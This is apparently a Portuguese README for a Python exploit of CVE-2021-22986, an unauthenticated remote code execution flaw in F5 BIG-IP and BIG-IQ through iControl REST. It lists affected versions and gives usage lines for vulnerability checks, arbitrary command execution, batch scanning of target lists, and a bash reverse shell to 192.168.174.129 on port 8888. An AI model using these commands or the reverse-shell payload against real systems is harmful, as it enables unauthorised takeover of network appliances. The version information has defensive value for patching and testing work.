
Exploit em Python para CVE-2021-22986, permitindo RCE não autenticado no F5 BIG-IP e BIG-IQ via iControl REST, com execução de comandos, varredura em lote e recursos de reverse shell.
Esta vulnerabilidade permite que atacantes não autenticados com acesso à rede à interface REST do iControl, por meio da interface de gerenciamento do BIG-IP e endereços self IP, executem comandos arbitrários do sistema, criem ou excluam arquivos e desativem serviços. Esta vulnerabilidade só pode ser explorada através do plano de controle e não pode ser explorada através do plano de dados. A exploração pode levar ao comprometimento total do sistema. O sistema BIG-IP no modo Appliance também é vulnerável.
F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1
python3 CVE_2021_22986.py
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
python3 CVE_2021_22986.py -s true -f check.txt
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
python3 newpoc.py https://192.168.174.164